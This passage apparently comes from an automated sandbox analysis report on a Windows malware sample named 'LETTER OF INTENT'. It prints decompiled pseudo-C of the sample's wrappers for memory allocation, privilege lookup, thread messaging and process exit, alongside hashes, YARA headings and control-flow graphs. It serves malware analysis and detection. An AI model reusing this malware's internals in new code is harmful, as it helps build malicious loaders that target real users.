              			}






              APIs
              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: AllocateMemoryVirtual
              • String ID:
              • API String ID: 2167126740-0
              • Opcode ID: ead0d1e4599c5376d0912e5e0e9384674333392f2b832a1716443487fbbc2499
              • Instruction ID: ebe5a3f519b2ba9f6db6c4faa06b87820768575a996a18753066eda75f6d58d4
              • Opcode Fuzzy Hash: ead0d1e4599c5376d0912e5e0e9384674333392f2b832a1716443487fbbc2499
              • Instruction Fuzzy Hash: 4FF0F2B6200209ABDB18DF99CC84EEB77A9FF88354F158659FE1897241C634E811CBB0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E004187B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
              				long _t14;
              				void* _t21;
              
              				_t3 = _a4 + 0xc60; // 0xca0
              				E004191D0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
              				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
              				return _t14;
              			}






              APIs
              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: AllocateMemoryVirtual
              • String ID:
              • API String ID: 2167126740-0
              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
              • Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
              • Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 82%
              			E00418700(void* __esi, intOrPtr _a4, void* _a8) {
              				long _t8;
              				void* _t11;
              
              				_t5 = _a4;
              				_t2 = _t5 + 0x10; // 0x300
              				_t3 = _t5 + 0xc50; // 0x409753
              				E004191D0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
              				_t8 = NtClose(_a8);
              				asm("rcr byte [esi+0x5d], 1");
              				return _t8;
              			}






              APIs
              • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: Close
              • String ID:
              • API String ID: 3535843008-0
              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
              • Instruction ID: 315d70e0dd0a86a48429d20d502ae4ae3fb499c677b3512a188e9811668946a9
              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
              • Instruction Fuzzy Hash: 17D01776200218BBE714EB99CC89EE77BACEF48760F154499BA189B242C570FA4086E0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 59%
              			E004088C0(intOrPtr _a4) {
              				intOrPtr _v8;
              				char _v24;
              				char _v284;
              				char _v804;
              				char _v840;
              				void* _t24;
              				signed int _t31;
              				signed int _t33;
              				void* _t34;
              				signed int _t39;
              				void* _t50;
              				intOrPtr _t52;
              				void* _t53;
              				void* _t54;
              				void* _t55;
              				void* _t56;
              
              				_t52 = _a4;
              				_t39 = 0; // executed
              				_t24 = E00406E20(_t52,  &_v24); // executed
              				_t54 = _t53 + 8;
              				if(_t24 != 0) {
              					E00407030( &_v24,  &_v840);
              					_t55 = _t54 + 8;
              					do {
              						E0041A0E0( &_v284, 0x104);
              						E0041A750( &_v284,  &_v804);
              						_t56 = _t55 + 0x10;
              						_t50 = 0x4f;
              						while(1) {
              							_push( &_v284);
              							_push(E00413D80(_t52, _t50));
              							_t31 = E00413DE0(__eflags);
              							_t56 = _t56 + 0x10;
              							__eflags = _t31;
              							if(_t31 != 0) {
              								break;
              							}
              							_t50 = _t50 + 1;
              							__eflags = _t50 - 0x62;
              							if(_t50 <= 0x62) {
              								continue;
              							} else {
              							}
              							L8:
              							_t33 = E00407060( &_v24,  &_v840);
              							_t55 = _t56 + 8;
              							__eflags = _t33;
              							if(_t33 != 0) {
              								goto L9;
              							}
              							goto L10;
              						}
              						_t9 = _t52 + 0x14; // 0xffffe1b5
              						_t10 = _t52 + 0x474;
              						 *_t10 =  *(_t52 + 0x474) ^  *_t9;
              						__eflags =  *_t10;
              						_t39 = 1;
              						goto L8;
              						L9:
              						__eflags = _t39;
              					} while (_t39 == 0);
              					L10:
              					_t34 = E004070E0(_t52,  &_v24); // executed
              					__eflags = _t39;
              					if(_t39 == 0) {
              						asm("rdtsc");
              						asm("rdtsc");
              						_v8 = _t34 - 0 + _t34;
              						_t16 = _t52 + 0x55c;
              						 *_t16 =  *(_t52 + 0x55c) + 0xffffffba;
              						__eflags =  *_t16;
              					}
              					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
              					_t20 = _t52 + 0x31; // 0x5608758b
              					_t21 = _t52 + 0x32;
              					 *_t21 =  *(_t52 + 0x32) +  *_t20 + 1;
              					__eflags =  *_t21;
              					return 1;
              				} else {
              					return _t24;
              				}
              			}

              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
              • Instruction ID: 45e1b5456bc83a9244d52dfc8b0508b5930111f9c3f75bdf3035c43f7544f730
              • Opcode Fuzzy Hash: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
              • Instruction Fuzzy Hash: C8212BB2D442085BCB11E6609D42BFF736C9B14304F04017FE989A2181FA38AB498BA7
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 36 418866-418868 37 41886a-41889d call 4191d0 36->37 38 4188bc-4188d1 RtlAllocateHeap 36->38
              C-Code - Quality: 29%
              			E00418866(void* __ebx, void* __ecx, void* __esi, void* __eflags, intOrPtr _a3, intOrPtr _a7, intOrPtr _a11, char _a12, long _a16, long _a20) {
              				void* _t11;
              				void* _t25;
              				void* _t28;
              				intOrPtr* _t29;
              				void* _t32;
              
              				_push(es);
              				if(__eflags >= 0) {
              					_t9 =  &_a12; // 0x413526
              					_t11 = RtlAllocateHeap( *_t9, _a16, _a20); // executed
              					return _t11;
              				} else {
              					_t28 = __esi + 1;
              					asm("sti");
              					_pop(_t32);
              					_t12 = _a3;
              					_t4 = _t12 + 0xc6c; // 0xc6e
              					_t29 = _t4;
              					E004191D0(_t25, _a3, _t29,  *((intOrPtr*)(_a3 + 0x10)), 0, 0x33);
              					return  *((intOrPtr*)( *_t29))(_a7, _a11, _t28, _t32);
              				}
              			}

              APIs
              • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: AllocateHeap
              • String ID: &5A
              • API String ID: 1279760036-1617645808
              • Opcode ID: 7d936363d04286f5f6077421a1080e55620e0d6ac9595c73a4e85d548d68526f
              • Instruction ID: da40474d02a9ce316bf4caa09ebbeee7a342e9cd35912896d4acfedce4566e88
              • Opcode Fuzzy Hash: 7d936363d04286f5f6077421a1080e55620e0d6ac9595c73a4e85d548d68526f
              • Instruction Fuzzy Hash: 33F09AB5200214ABDB18EF68DC84EEB73A9EF88354F148489FC884B242C531EA10CBF0
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 42 4188a0-4188b6 43 4188bc-4188d1 RtlAllocateHeap 42->43 44 4188b7 call 4191d0 42->44 44->43
              C-Code - Quality: 100%
              			E004188A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
              				void* _t10;
              				void* _t15;
              
              				E004191D0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
              				_t6 =  &_a8; // 0x413526
              				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
              				return _t10;
              			}

              APIs
              • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: AllocateHeap
              • String ID: &5A
              • API String ID: 1279760036-1617645808
              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
              • Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
              • Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 279 407307-40730b 280 40730d 279->280 281 40735f-407368 279->281 282 4072b0-4072bd 280->282 283 40730f-40735a call 41a130 call 407280 call 4199c0 280->283 284 407370-4073a2 call 40d3c0 call 418770 281->284 286 4072c3-4072ca 282->286 287 4072be call 413e40 282->287 283->281 300 4073a4-4073ac 284->300 301 4073d7-4073df 284->301 290 4072cc-4072de PostThreadMessageW 286->290 291 4072fe-407302 286->291 287->286 294 4072e0-4072fa call 409290 290->294 295 4072fd 290->295 294->295 295->291 304 4073c6-4073d0 300->304 305 4073ae-4073b5 300->305 304->284 308 4073d2-4073d5 304->308 305->304 307 4073b7-4073be 305->307 307->304 309 4073c0-4073c4 307->309 310 4073fd-40740f call 418700 308->310 309->304 311 4073e0-4073fa call 41a0b0 309->311 310->301 315 407411-40747c call 417f80 310->315 311->310 315->301 319 407482-4074de call 417fc0 315->319 319->301 322 4074e4-407531 call 419660 call 419680 call 41a3a0 call 41a0b0 call 413a40 319->322
              C-Code - Quality: 67%
              			E00407307(intOrPtr* __eax, void* __ecx, void* __fp0, intOrPtr _a4, long _a12, intOrPtr _a16, int _a20) {
              				signed char _v4;
              				signed char _v8;
              				char _v117;
              				signed char _v128;
              				signed char _v132;
              				char _v652;
              				signed char _v664;
              				char _v684;
              				signed char _v688;
              				void* __ebx;
              				intOrPtr __edi;
              				intOrPtr __esi;
              				signed char _t67;
              				int _t70;
              				signed char _t76;
              				intOrPtr* _t77;
              				signed char _t79;
              				void* _t86;
              				int _t89;
              				signed int _t91;
              				void* _t92;
              				signed char _t94;
              				intOrPtr* _t95;
              				signed int* _t105;
              				signed char _t110;
              				intOrPtr _t115;
              				long _t118;
              				void* _t120;
              				int _t125;
              				void* _t127;
              				void* _t131;
              
              				asm("sbb al, 0xf7");
              				if(__ecx >=  *__eax) {
              					L10:
              					_a20 = 0;
              					while(1) {
              						E0040D3C0(_t115, 0xfe363c80); // executed
              						_t67 = E00418770(_t115,  *((intOrPtr*)(_t120 + 0x2f4)), _t92,  &_v684, 0x2a8, 0); // executed
              						_t131 = _t131 + 0x20;
              						 *(_t120 + 0x2dc) = _t67;
              						__eflags = _t67;
              						if(_t67 < 0) {
              							break;
              						}
              						__eflags = _v652;
              						if(_v652 == 0) {
              							L16:
              							_t70 = _a20 + 1;
              							_a20 = _t70;
              							__eflags = _t70 - 2;
              							if(_t70 < 2) {
              								continue;
              							} else {
              								_t94 = _v4;
              								goto L20;
              							}
              						} else {
              							__eflags = _v664;
              							if(_v664 == 0) {
              								goto L16;
              							} else {
              								__eflags = _v132;
              								if(_v132 == 0) {
              									goto L16;
              								} else {
              									__eflags = _v128;
              									if(_v128 != 0) {
              										_t94 = 1;
              										E0041A0B0(_a16,  &_v684, 0x2a8);
              										_t131 = _t131 + 0xc;
              										L20:
              										E00418700(_t120, _t115,  *((intOrPtr*)(_t120 + 0x2f4))); // executed
              										__eflags = _t94;
              										if(_t94 == 0) {
              											break;
              										} else {
              											 *(_a16 + 0x14) = _v664;
              											_t35 = _t120 + 0x2e8; // 0x2e8
              											 *_t35 = _v132;
              											_t37 = _t120 + 0x314; // 0x314
              											_t95 = _t37;
              											 *_t95 = 0x18;
              											 *((intOrPtr*)(_t120 + 0x318)) = 0;
              											 *((intOrPtr*)(_t120 + 0x320)) = 0;
              											 *((intOrPtr*)(_t120 + 0x31c)) = 0;
              											 *((intOrPtr*)(_t120 + 0x324)) = 0;
              											 *((intOrPtr*)(_t120 + 0x328)) = 0;
              											_t76 = E00417F80(_t115, _a16 + 0x220,  *((intOrPtr*)(_t120 + 0x2d0)), _t95, _t35);
              											 *(_t120 + 0x2dc) = _t76;
              											__eflags = _t76;
              											if(_t76 < 0) {
              												break;
              											} else {
              												_t110 = _v128;
              												_t45 = _t120 + 0x2e0; // 0x2e0
              												_t77 = _t45;
              												_push(_t77);
              												 *((intOrPtr*)(_t120 + 0x318)) = 0;
              												 *((intOrPtr*)(_t120 + 0x320)) = 0;
              												 *((intOrPtr*)(_t120 + 0x31c)) = 0;
              												 *((intOrPtr*)(_t120 + 0x324)) = 0;
              												 *((intOrPtr*)(_t120 + 0x328)) = 0;
              												_push(_t95);
              												_push(0x1a);
              												_t105 = _a16 + 0x224;
              												__eflags = _t105;
              												_push(_t105);
              												_push(_t115);
              												 *(_t120 + 0x2e4) = _t110;
              												 *_t95 = 0x18;
              												 *((intOrPtr*)(_t120 + 0x2d0)) = 0x1a;
              												 *_t110 =  *_t110 + _t95;
              												 *_t77 =  *_t77 + _t77;
              												asm("in eax, dx");
              												_t79 = _t77 + _t105 |  *_t105;
              												 *((intOrPtr*)(_t95 - 0x7976eb3c)) =  *((intOrPtr*)(_t95 - 0x7976eb3c)) + _t79;
              												 *_t79 =  *_t79 + _t79;
              												__eflags = _t79;
              												if(_t79 < 0) {
              													break;
              												} else {
              													__eflags =  *((intOrPtr*)(_a12 + 0x10)) + 0x200;
              													_t61 = E0041A3A0( *((intOrPtr*)(E00419680(0, E00419660(_t105)) + 0x28))) + 2; // 0x2
              													E0041A0B0( *((intOrPtr*)(_a12 + 0x10)) + 0x200,  *((intOrPtr*)(_t81 + 0x28)), _t83 + _t61);
              													_t86 = E00413A40(_t115,  &_v652, 2, 0); // executed
              													return _t86;
              												}
              											}
              										}
              									} else {
              										goto L16;
              									}
              								}
              							}
              						}
              						goto L25;
              					}
              					__eflags = 0;
              					return 0;
              				} else {
              					if(__eflags <= 0) {
              						 *__eax =  *__eax - __eax;
              						 *((intOrPtr*)(__eax - 0x2a)) =  *((intOrPtr*)(__eax - 0x2a)) + __ecx;
              						asm("les ebp, [edx]");
              						_push(0);
              						_push(__eax);
              						_push(_t120);
              						_t89 = E00413E40(_t120);
              						_t125 = _t89;
              						if(_t125 != 0) {
              							_push(_t115);
              							_t118 = _a12;
              							_t89 = PostThreadMessageW(_t118, 0x111, 0, 0); // executed
              							_t142 = _t89;
              							if(_t89 == 0) {
              								_t91 = E00409290(_t142, 1, 8) & 0x000000ff;
              								 *_t91 =  *_t91;
              								_t89 =  *_t125(_t118, 0x8003, _t127 + _t91 - 0x40, _t89);
              							}
              						}
              						return _t89;
              					} else {
              						__ebp = __esp;
              						__esp = __esp - 0x2ac;
              						_push(__esi);
              						__eax = 0;
              						__eflags = 0;
              						_v8 = 0;
              						_v688 = 0;
              						 &_v684 = E0041A130( &_v684, 0, 0x2a4);
              						__esi = _a16;
              						__ecx =  *((intOrPtr*)(__esi + 0x300));
              						__edi = _a4;
              						__eax = E00407280(__eflags, _a4,  *((intOrPtr*)(__esi + 0x300))); // executed
              						__eax = E004199C0(__ecx);
              						_t15 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
              						__ebx = __eax + _t15;
              						goto L10;
              					}
              				}
              				L25:
              			}

              APIs
              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID:
              • API String ID: 1836367815-0
              • Opcode ID: 76739e20f901698dcda1f5da6d21d47beb3d7048824c40d25536308e69fd9ebf
              • Instruction ID: 6f6e70f3fba3dcf9909d8ab4c173c79609f2e09c75bf410fee7ec2c7179832cf
              • Opcode Fuzzy Hash: 76739e20f901698dcda1f5da6d21d47beb3d7048824c40d25536308e69fd9ebf
              • Instruction Fuzzy Hash: 1161C570900309AFD724DF64DC85FEBB7B8EB09304F10046EF949A7281D774A941CBAA
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 333 418a75-418a78 334 418a7a-418a7b 333->334 335 418a4c-418a5a call 4191d0 333->335 337 418ac5-418ae7 call 419240 334->337 338 418a7d-418ab0 call 4191d0 334->338 340 418a5f-418a74 LookupPrivilegeValueW 335->340
              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: 7056bcd6f64928b91b1700fc4088005a7ba183f341221da499c199913806fe6a
              • Instruction ID: a2d0a06de7dc0bbbbca700c1d77ce6db5c85b0a914901fed399fb6f6e97368fc
              • Opcode Fuzzy Hash: 7056bcd6f64928b91b1700fc4088005a7ba183f341221da499c199913806fe6a
              • Instruction Fuzzy Hash: 5C11A071200244AFE724EF68CC85EEB7BA8EF84750F14859AF94C5B242C639A9558BA4
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 346 407280-4072ca call 41a130 call 41ad10 call 409b30 call 413e40 355 4072cc-4072de PostThreadMessageW 346->355 356 4072fe-407302 346->356 357 4072e0-4072fa call 409290 355->357 358 4072fd 355->358 357->358 358->356
              C-Code - Quality: 31%
              			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
              				char _v67;
              				char _v68;
              				void* __esi;
              				intOrPtr* _t14;
              				intOrPtr* _t15;
              				int _t16;
              				signed int _t18;
              				char* _t19;
              				long _t24;
              				void* _t27;
              				intOrPtr* _t28;
              				void* _t29;
              
              				_v68 = 0;
              				E0041A130( &_v67, 0, 0x3f);
              				_t19 =  &_v68;
              				E0041AD10(_t19, 3);
              				_t27 = _a4 + 0x1c;
              				_t14 = E00409B30(_t27,  &_v68);
              				 *_t14 =  *_t14 - _t14;
              				 *((intOrPtr*)(_t14 - 0x2a)) =  *((intOrPtr*)(_t14 - 0x2a)) + _t19;
              				asm("les ebp, [edx]");
              				_push(0);
              				_push(_t14);
              				_push(_t27);
              				_t15 = E00413E40(_t27);
              				_t28 = _t15;
              				if(_t28 != 0) {
              					_t24 = _a8;
              					_t16 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
              					_t36 = _t16;
              					if(_t16 != 0) {
              						L5:
              						return _t16;
              					}
              					_t18 = E00409290(_t36, 1, 8) & 0x000000ff;
              					 *_t18 =  *_t18;
              					_t16 =  *_t28(_t24, 0x8003, _t29 + _t18 - 0x40, _t16);
              					goto L5;
              				}
              				return _t15;
              			}

              APIs
              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID:
              • API String ID: 1836367815-0
              • Opcode ID: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
              • Instruction ID: b237522831fa2f29c3a6f065e8e6a5a8a1bdd1e87b57dfaece1adfce5d1a8559
              • Opcode Fuzzy Hash: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
              • Instruction Fuzzy Hash: DC018431A8022876E721AA959C03FFE776C5B00B55F15416EFF04BA1C2E6A8790546EA
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: FreeHeap
              • String ID:
              • API String ID: 3298025750-0
              • Opcode ID: 7716b84c71980f1a8dd307046fc00bace5034a0c3e06cba556fd4c8214d88868
              • Instruction ID: d1030311b93a8d47fe3ed60a87453878cc95385ce9d5856c12068c91900ba487
              • Opcode Fuzzy Hash: 7716b84c71980f1a8dd307046fc00bace5034a0c3e06cba556fd4c8214d88868
              • Instruction Fuzzy Hash: 9CE0D8B82041429FDB04EFA9C9D089F3795AF85314718894AE8485730AC570D85ACBB2
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E004188E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
              				char _t10;
              				void* _t15;
              
              				_t3 = _a4 + 0xc74; // 0xc74
              				E004191D0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
              				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
              				return _t10;
              			}

              APIs
              • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: FreeHeap
              • String ID:
              • API String ID: 3298025750-0
              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
              • Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
              • Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00418A40(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
              				int _t10;
              				intOrPtr _t11;
              				void* _t15;
              
              				_t7 = _a4;
              				_t11 =  *((intOrPtr*)(_a4 + 0xa18));
              				E004191D0(_t15, _t7, _t7 + 0xc8c, _t11, 0, 0x46);
              				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
              				return _t10;
              			}

              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
              • Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
              • Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00418A3C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
              				int _t11;
              				intOrPtr _t12;
              				void* _t16;
              
              				_t8 = _a4;
              				_t12 =  *((intOrPtr*)(_a4 + 0xa18));
              				E004191D0(_t16, _t8, _t8 + 0xc8c, _t12, 0, 0x46);
              				_t11 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
              				return _t11;
              			}

              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: b45dee70ed22d17df6f0e90a2ffabdae220b0ae93979b54163b61920d7c8951f
              • Instruction ID: 70dc13c0f72bcd72c0783b85a0a15573f433d91c466f67422e70243bce41931b
              • Opcode Fuzzy Hash: b45dee70ed22d17df6f0e90a2ffabdae220b0ae93979b54163b61920d7c8951f
              • Instruction Fuzzy Hash: 88E01AB5200208AFDB14DF55CC85EE737A9AF89294F058199FE485B242C934E851CBF5
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00418920(intOrPtr _a4, int _a8) {
              				void* _t10;
              
              				_t5 = _a4;
              				E004191D0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
              				ExitProcess(_a8);
              			}




              0x00418923
              0x0041893a
              0x00418948

              APIs
              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID: ExitProcess
              • String ID:
              • API String ID: 621844428-0
              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
              • Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
              • Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00415672(void* __esi, void* __fp0) {
              
              				return  *0xe7299df1;
              			}



              0x00415686

              Memory Dump Source
              • Source File: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_LETTER OF INTENT.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e61c330e18b722eaf5635ac44f79757822460d77a7eb09780081277e83407bb6
              • Instruction ID: 5444c510b41dd443bfcb257791b0198e79e226132e256492a23fa7ce6c41a4ab
              • Opcode Fuzzy Hash: e61c330e18b722eaf5635ac44f79757822460d77a7eb09780081277e83407bb6
              • Instruction Fuzzy Hash: FDB09B76A591094785205E18B9C5170F3B4E387139B103767DC55635109152D4544599
              Uniqueness

              Uniqueness Score: -1.00%

              Execution Graph

              Execution Coverage:5%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:0%
              Total number of Nodes:691
              Total number of Limit Nodes:83

